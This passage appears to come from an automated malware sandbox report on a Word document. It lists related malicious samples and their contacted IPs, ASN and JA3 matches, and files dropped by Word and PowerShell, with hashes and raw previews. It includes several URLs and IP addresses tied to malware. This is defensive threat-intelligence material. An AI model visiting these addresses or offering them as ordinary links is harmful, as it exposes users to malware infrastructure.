                                                                      Jyud0uPIRu.docGet hashmaliciousBrowse
                                                                      • 191.6.198.191
                                                                      yH7WbTpvwU.docGet hashmaliciousBrowse
                                                                      • 191.6.198.191
                                                                      p3QPprGcL9.docGet hashmaliciousBrowse
                                                                      • 191.6.198.191
                                                                      3CEenXi4tj.docGet hashmaliciousBrowse
                                                                      • 191.6.198.191
                                                                      cbdbiBCPkK.docGet hashmaliciousBrowse
                                                                      • 191.6.198.191
                                                                      2Es3D1PlTF.docGet hashmaliciousBrowse
                                                                      • 191.6.198.191
                                                                      F734Y7dkLk.docGet hashmaliciousBrowse
                                                                      • 191.6.198.191
                                                                      riK37JutrL.docGet hashmaliciousBrowse
                                                                      • 191.6.198.191
                                                                      pQSOm5LwaI.docGet hashmaliciousBrowse
                                                                      • 191.6.198.191
                                                                      hbprivileged.comARCH-SO-930373.docGet hashmaliciousBrowse
                                                                      • 35.209.96.32
                                                                      ummahstars.comZ8363664.docGet hashmaliciousBrowse
                                                                      • 35.163.191.195

                                                                      ASN

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      OVHFRARCH_25_012021.docGet hashmaliciousBrowse
                                                                      • 51.255.203.164
                                                                      Invoice-3990993.exeGet hashmaliciousBrowse
                                                                      • 66.70.204.222
                                                                      ra8tqy1c.rar.dllGet hashmaliciousBrowse
                                                                      • 158.69.118.130
                                                                      ARCH_25_012021.docGet hashmaliciousBrowse
                                                                      • 51.255.203.164
                                                                      WUHU95Apq3Get hashmaliciousBrowse
                                                                      • 46.105.5.118
                                                                      SecuriteInfo.com.ArtemisTrojan.dllGet hashmaliciousBrowse
                                                                      • 158.69.118.130
                                                                      SecuriteInfo.com.Generic.mg.59d4c719403b7938.dllGet hashmaliciousBrowse
                                                                      • 158.69.118.130
                                                                      SecuriteInfo.com.Generic.mg.9d9c1d19818e75cc.dllGet hashmaliciousBrowse
                                                                      • 158.69.118.130
                                                                      SecuriteInfo.com.ArtemisTrojan.dllGet hashmaliciousBrowse
                                                                      • 158.69.118.130
                                                                      SecuriteInfo.com.ArtemisTrojan.dllGet hashmaliciousBrowse
                                                                      • 158.69.118.130
                                                                      roboforex4multisetup.exeGet hashmaliciousBrowse
                                                                      • 139.99.148.202
                                                                      xDKOaCQQTQ.dllGet hashmaliciousBrowse
                                                                      • 158.69.118.130
                                                                      4bEUfowOcg.dllGet hashmaliciousBrowse
                                                                      • 158.69.118.130
                                                                      P_O INV 01262021.exeGet hashmaliciousBrowse
                                                                      • 51.195.53.221
                                                                      DHL doc.exeGet hashmaliciousBrowse
                                                                      • 51.195.53.221
                                                                      PL5CS6pwNitND2n.exeGet hashmaliciousBrowse
                                                                      • 51.75.130.83
                                                                      Arch_2021_717-1562532.docGet hashmaliciousBrowse
                                                                      • 51.255.203.164
                                                                      PARTS REQUEST SO_30005141.exeGet hashmaliciousBrowse
                                                                      • 66.70.204.222
                                                                      Document_PDF.exeGet hashmaliciousBrowse
                                                                      • 51.195.53.221
                                                                      SecuriteInfo.com.Variant.Zusy.363976.21086.exeGet hashmaliciousBrowse
                                                                      • 54.39.198.228
                                                                      IPV6InternetLtdaBRFILE.docGet hashmaliciousBrowse
                                                                      • 191.6.196.95
                                                                      FHT210995.exeGet hashmaliciousBrowse
                                                                      • 177.185.193.50
                                                                      Doc_18420540.docGet hashmaliciousBrowse
                                                                      • 191.6.200.86
                                                                      https://mrveggy.com/resgatecarrinho/jcWVa69vj8IDsQRCud8h6RNI9Mz17JqsPPJ0DFnlbXZGyMM2GcZ3/Get hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      INV_Xg.docGet hashmaliciousBrowse
                                                                      • 191.6.210.27
                                                                      1I72L29IL3F.docGet hashmaliciousBrowse
                                                                      • 191.6.212.159
                                                                      GT-9333 Medical report COVID-19.docGet hashmaliciousBrowse
                                                                      • 191.6.208.18
                                                                      City Report - December.docGet hashmaliciousBrowse
                                                                      • 191.6.208.18
                                                                      Emmmmmmm.docGet hashmaliciousBrowse
                                                                      • 191.6.213.117
                                                                      VQ01173428.docGet hashmaliciousBrowse
                                                                      • 191.6.208.15
                                                                      #U306b#U4fee 2020-09-19.docGet hashmaliciousBrowse
                                                                      • 191.6.222.114
                                                                      http://bhar.com.br/elementos/public/Get hashmaliciousBrowse
                                                                      • 191.6.196.88
                                                                      Untitled_7367763-38724.docGet hashmaliciousBrowse
                                                                      • 191.6.196.95
                                                                      INFO.docGet hashmaliciousBrowse
                                                                      • 191.6.196.95
                                                                      Electronic form.docGet hashmaliciousBrowse
                                                                      • 191.6.196.118
                                                                      20160122_68121911659aa7611b6bcaae131d55b2.jsGet hashmaliciousBrowse
                                                                      • 191.6.192.114
                                                                      20160122_68121911659aa7611b6bcaae131d55b2.jsGet hashmaliciousBrowse
                                                                      • 191.6.192.114
                                                                      Attachments E84598.docGet hashmaliciousBrowse
                                                                      • 177.185.196.31
                                                                      http://crupie.com.br/teste/sites/xfiij3985199578140397829dez486w2hd0plzuic/Get hashmaliciousBrowse
                                                                      • 177.185.206.83
                                                                      rapport du 21 sept..docGet hashmaliciousBrowse
                                                                      • 191.6.204.145
                                                                      CRYSTALTECHUSFILE.docGet hashmaliciousBrowse
                                                                      • 75.103.81.81
                                                                      http://s1022.t.en25.com/e/er?s=1022&lid=2184&elqTrackId=BEDFF87609C7D9DEAD041308DD8FFFB8&lb_email=bkirwer%40farbestfoods.com&elq=b095bd096fb54161953a2cf8316b5d13&elqaid=3115&elqat=1Get hashmaliciousBrowse
                                                                      • 63.134.242.129
                                                                      DOCUMENTO_MEDICO.docGet hashmaliciousBrowse
                                                                      • 209.200.87.182
                                                                      ULffUM9qZE.exeGet hashmaliciousBrowse
                                                                      • 216.119.106.22
                                                                      https://www.raddelmotalaka.com/wp-include/zimonedrive/Get hashmaliciousBrowse
                                                                      • 63.134.242.129

                                                                      JA3 Fingerprints

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      05af1f5ca1b87cc9cc9b25185115607dSecuriteInfo.com.Exploit.Siggen3.8790.14645.xlsGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      SecuriteInfo.com.Trojan.DOC.Agent.ATB.11104.xlsGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      Informacion.docGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      PAYMENT.260121.xlsxGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      IMG_761213.docGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      IMG-51033.docGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      ARCH_98_24301.docGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      Bestellung.docGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      Revised-RBG-180129940.xlsxGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      N00048481397007.docGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      Order.docGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      SecuriteInfo.com.Heur.13954.xlsGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      case_3499.xlsGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      case.2991.xlsGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      N00048481397007.docGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      info5440.xlsGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      notif-3615.xlsGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      notif6158.xlsGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      INC_Y5KPAYAWWU7.docGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      mensaje_012021_1-538086.docGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                      Category:dropped
                                                                      Size (bytes):59134
                                                                      Entropy (8bit):7.995450161616763
                                                                      Encrypted:true
                                                                      SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                      MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                      SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                      SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                      SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                      Malicious:false
                                                                      Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):893
                                                                      Entropy (8bit):7.366016576663508
                                                                      Encrypted:false
                                                                      SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                                                      MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                                                      SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                                                      SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                                                      SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                                                      Malicious:false
                                                                      Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):328
                                                                      Entropy (8bit):3.0664620025581253
                                                                      Encrypted:false
                                                                      SSDEEP:6:kKCHbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:B3kPlE99SNxAhUeo+aKt
                                                                      MD5:8AB92BD02DEBE46B03720E9B4E92FEF4
                                                                      SHA1:1201275CD8B208AA5FE8B509DD66BD9FE2E53383
                                                                      SHA-256:498E98249C1BB06868B90E21DC38041E9BEF547E0763D61F2ECCB86F00FB6404
                                                                      SHA-512:85CA865095F251133261FC4054866C8623339E466003BAC5E3C5A94B9018CB05ECC3C55214B98C12BF77C485E76ABFC00D989E477DC59D191C114BC8488783FE
                                                                      Malicious:false
                                                                      Preview: p...... ........:..w....(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):252
                                                                      Entropy (8bit):3.0215269645321685
                                                                      Encrypted:false
                                                                      SSDEEP:3:kkFkllRzEvfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKwIliBAIdQZV7eAYLit
                                                                      MD5:DC910AE1F9AE675627D93DF168B8B4A7
                                                                      SHA1:F1812087EE764C1ED12E399B164BDBBEA33235D8
                                                                      SHA-256:90278AA59F3EBA385DA5E25B790F7897C21E262DBA2CDC6E08EDBD211A5123A9
                                                                      SHA-512:847369ACB7C56ACE8357FD58CAECF72EDE8444A1659343094373B7C5ED39EF82885B4162C8DA3869D8D74F95EF18737845E46C98B045CC659F0B078BA929479B
                                                                      Malicious:false
                                                                      Preview: p...... ....`....Y.w....(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A5D6EDBE-EB6B-4CC4-8C38-663EBE143117}.tmp
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1024
                                                                      Entropy (8bit):0.05390218305374581
                                                                      Encrypted:false
                                                                      SSDEEP:3:ol3lYdn:4Wn
                                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                      Malicious:false
                                                                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E76E1ED2-1DC6-41B5-9D5C-624688043260}.tmp
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1536
                                                                      Entropy (8bit):1.3554734412254814
                                                                      Encrypted:false
                                                                      SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbE:IiiiiiiiiifdLloZQc8++lsJe1MzL
                                                                      MD5:3E5010CAE259871D6964270190F8ADCE
                                                                      SHA1:C57EA259D1DF1C244C8A4C4D3AC7FA37AEFA1869
                                                                      SHA-256:F1B89BC47B850CD5352C45E86AEC6F63F6C80F22FA4A9CC589EF18219E6BF8EB
                                                                      SHA-512:FC6112BB9EF82273E598CF32220CE02EEBC57A9B805E438D3207F5CA7C02C4990E5B5CABF2B1BB7AEF7E9CA69D966DD0E0BD90E2C5B591BBE94FACD3636E2ADD
                                                                      Malicious:false
                                                                      Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      C:\Users\user\AppData\Local\Temp\Cab479B.tmp
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                      Category:dropped
                                                                      Size (bytes):59134
                                                                      Entropy (8bit):7.995450161616763
                                                                      Encrypted:true
                                                                      SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                      MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                      SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                      SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                      SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                      Malicious:false
                                                                      Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                      C:\Users\user\AppData\Local\Temp\Tar479C.tmp
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):152788
                                                                      Entropy (8bit):6.316654432555028
                                                                      Encrypted:false
                                                                      SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                                                                      MD5:64FEDADE4387A8B92C120B21EC61E394
                                                                      SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                                                                      SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                                                                      SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                                                                      Malicious:false
                                                                      Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ARCHIVOFile-20-012021.LNK
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Wed Aug 26 14:08:12 2020, atime=Wed Jan 27 19:17:33 2021, length=163328, window=hide
                                                                      Category:dropped
                                                                      Size (bytes):2138
                                                                      Entropy (8bit):4.5326539197703415
                                                                      Encrypted:false
                                                                      SSDEEP:48:8b/XT3Inbeh6o3up5Qh2b/XT3Inbeh6o3up5Q/:8b/XLInbXdp5Qh2b/XLInbXdp5Q/
                                                                      MD5:05A81D9871CC5A9D1C9496971871A4C3
                                                                      SHA1:4B43D1A721FDEED3C350721541F3F032E98057DC
                                                                      SHA-256:F2631F760EED5D1400F08304FDE9686A689A11AAA5343519DF9F988C18ADA39B
                                                                      SHA-512:725EF51348035ACA47084FE0C13FED8AD39801962A1DA3E1854984A78E6769138ACC2874086513B983CC9A9781E9A7E8CCE6B314E3A315826F1106E19158113B
                                                                      Malicious:false
                                                                      Preview: L..................F.... ...$l...{..$l...{....'r.....~...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2..~..;R1. .ARCHIV~1.DOC..`.......Q.y.Q.y*...8.....................A.R.C.H.I.V.O.F.i.l.e.-.2.0.-.0.1.2.0.2.1...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\445817\Users.user\Desktop\ARCHIVOFile-20-012021.doc.0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.A.R.C.H.I.V.O.F.i.l.e.-.2.0.-.0.1.2.0.2.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......445817.........
                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):101
                                                                      Entropy (8bit):4.560529244991619
                                                                      Encrypted:false
                                                                      SSDEEP:3:M1+GFVCl8WLFVClmX1+GFVClv:M4G6rL6PG61
                                                                      MD5:BCAC8ED9B42DA8EFA65F54705C070EC9
                                                                      SHA1:F176DE20E4C0A978E9E5E0039B71EA72D94E1C20
                                                                      SHA-256:E0586F37CF5912AC227F6363F87FF700D71C8C2CE24E933C7DB34DEDD9551F3F
                                                                      SHA-512:F66C0695FAD82E6842E9FDC2AAFBE40FE51EC071737B6F2116C7035895DB01C52934DF3256603C88E158F0AA2435C9C273B8960210845BF3B9FF18FD25CF87E9
                                                                      Malicious:false
                                                                      Preview: [doc]..ARCHIVOFile-20-012021.LNK=0..ARCHIVOFile-20-012021.LNK=0..[doc]..ARCHIVOFile-20-012021.LNK=0..
                                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):162
                                                                      Entropy (8bit):2.431160061181642
                                                                      Encrypted:false
                                                                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                      Malicious:false
                                                                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1JTN6F3VHEJQWGEUZSLB.temp
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):8016
                                                                      Entropy (8bit):3.587203250476091
                                                                      Encrypted:false
                                                                      SSDEEP:96:chQCIMqZqvsqvJCwofz8hQCIMqZqvsEHyqvJCworZzv9YyH8f8OZlUVNIu:c2wofz82MHnorZzvyf8OIIu
                                                                      MD5:9AFBC91BB6F8B5858AB7A4886ABC3073
                                                                      SHA1:3F15E4645EB1DF3E393D032664CEDF46A22C5A60
                                                                      SHA-256:5D85266D69AFD60CE498DEBB2375E63D81F2534E6F4104692C11D904D81DCCCA
                                                                      SHA-512:6B5F8AA7CBE4E1EA63654DEA4EC746D3A7C0F588D9CE2A48D500BC3175D9D255FBD806CDDA798C04B6D0FCE2F09295F6755A17F482085DE2460ED1269D4EA324
                                                                      Malicious:false
                                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Q.y..Programs..f.......:...Q.y*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                      C:\Users\user\Desktop\~$CHIVOFile-20-012021.doc
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):162
                                                                      Entropy (8bit):2.431160061181642
                                                                      Encrypted:false
                                                                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                      Malicious:false
                                                                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
